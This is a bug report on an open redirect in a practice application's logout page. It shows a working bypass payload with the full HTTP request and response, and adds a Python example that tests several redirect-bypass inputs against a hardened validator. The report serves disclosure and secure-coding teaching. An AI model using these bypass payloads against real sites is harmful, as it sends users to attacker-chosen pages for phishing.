FirstBlood-#41 — Open URL Redirect on /drpanel/logout.php
This issue was discovered on FirstBlood v1.0.0
On 2021-05-09, rintox Level 3 reported:
There's an Open URL Redirect vulnerability in the logout functionality. If a malicious actor sends the link to the logged-in doctor, the application will redirect the doctor to a malicious site.
Steps to Reproduce
- As a logged in Doctor, click on the securely sign out button.
- Notice the endpoint has a ref variable.
- If you submit the following payload, the application will redirect the user to the URL provided by the payload:
GET /drpanel/logout.php?ref=//https:\/\/www.google.com HTTP/1.1
Host: firstbloodhackers.com:49250
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49250/drpanel/index.php
Cookie: drps=5d7d4cc8df1274aac3ef42507
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 09 May 2021 16:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://www.google.com
Content-Length: 0
As you can notice, the location header has the google.com url in it, which will take the user to that url.
Since the application does not have a mechanism to validate that the logged-in user wants to log out, if the Doctor visits the URL provided by the attacker, it will redirect him/her to the malicious site.
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open URL redirect vulnerability on /logout.php. The code expects the ref value to start with / and does not allow redirects to external domains, but this check can be bypassed.
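The following is an added example, not code from FirstBlood or from the report above. It contrasts a hypothetical weak "must start with /" check (assumed here as the shape of the flawed logic; the page does not show the actual PHP) with a hardened validator that rejects protocol-relative and backslash variants, resolves the final Location against the site's own origin (the firstbloodhackers.com:49250 host from the report), and falls back to a fixed same-site path. It also covers the report's second point by requiring a POST with a CSRF token before logging out. The sample inputs, including the report's payload, are constructed for the demonstration.

```python
import hmac
from urllib.parse import urljoin, urlsplit

# Constructed samples: ref value -> whether a correct validator should accept it.
SAMPLE_REFS = {
    "/drpanel/index.php": True,
    "/drpanel/logout.php?ref=x": True,
    "//https:\\/\\/www.google.com": False,   # payload from the report (one backslash each)
    "//evil.example": False,                 # protocol-relative
    "/\\evil.example": False,                # browsers treat "\" as "/"
    "https://evil.example/": False,
    "javascript:alert(1)": False,
    "": False,
}

DEFAULT_AFTER_LOGOUT = "/drpanel/index.php"   # assumed landing page
SITE_ORIGIN = "https://firstbloodhackers.com:49250"


def weak_is_local(ref: str) -> bool:
    """Hypothetical weak check: only insists on a leading slash.
    Accepts '//host' and '/\\host', which browsers resolve off-site."""
    return ref.startswith("/")


def safe_redirect_target(ref: str, default: str = DEFAULT_AFTER_LOGOUT) -> str:
    """Return ref only if it is a plain same-site absolute path; otherwise default.

    Rejects empty values, backslashes, control characters, anything that does not
    start with exactly one '/', and anything urlsplit sees as having a scheme or host.
    """
    if not ref or "\\" in ref or any(ord(c) < 0x20 for c in ref):
        return default
    if not ref.startswith("/") or ref.startswith("//"):
        return default
    parts = urlsplit(ref)
    if parts.scheme or parts.netloc:
        return default
    return ref


def resolve_location(ref: str, origin: str = SITE_ORIGIN) -> str:
    """Build the absolute Location header value and re-check the host.

    Belt and braces: even after safe_redirect_target, compare the host of the
    resolved URL with the site's own host and fall back if they differ.
    """
    target = safe_redirect_target(ref)
    location = urljoin(origin + "/", target)
    if urlsplit(location).netloc != urlsplit(origin).netloc:
        location = urljoin(origin + "/", DEFAULT_AFTER_LOGOUT)
    return location


def logout_allowed(method: str, submitted_token: str, session_token: str) -> bool:
    """Logout should be a state-changing POST tied to the session (CSRF token),
    so a link sent to a doctor cannot log them out and bounce them elsewhere."""
    if method.upper() != "POST" or not submitted_token or not session_token:
        return False
    return hmac.compare_digest(submitted_token, session_token)


def classify(ref: str) -> dict:
    """Show how the weak and hardened checks differ on one ref value."""
    return {
        "weak_accepts": weak_is_local(ref),
        "safe_accepts": safe_redirect_target(ref) == ref,
        "location": resolve_location(ref),
    }


def check_samples() -> bool:
    """True if the hardened validator agrees with SAMPLE_REFS on every input."""
    return all((safe_redirect_target(r) == r) == ok for r, ok in SAMPLE_REFS.items())


if __name__ == "__main__":
    for r in SAMPLE_REFS:
        print(repr(r), classify(r))
    print("hardened validator matches expectations:", check_samples())
```

The report's payload passes the weak check (it begins with "/") but is dropped by the hardened validator at the backslash test; a bare "//evil.example" survives the weak check too and is caught by the double-slash rule, with the origin comparison in resolve_location as a last line of defence.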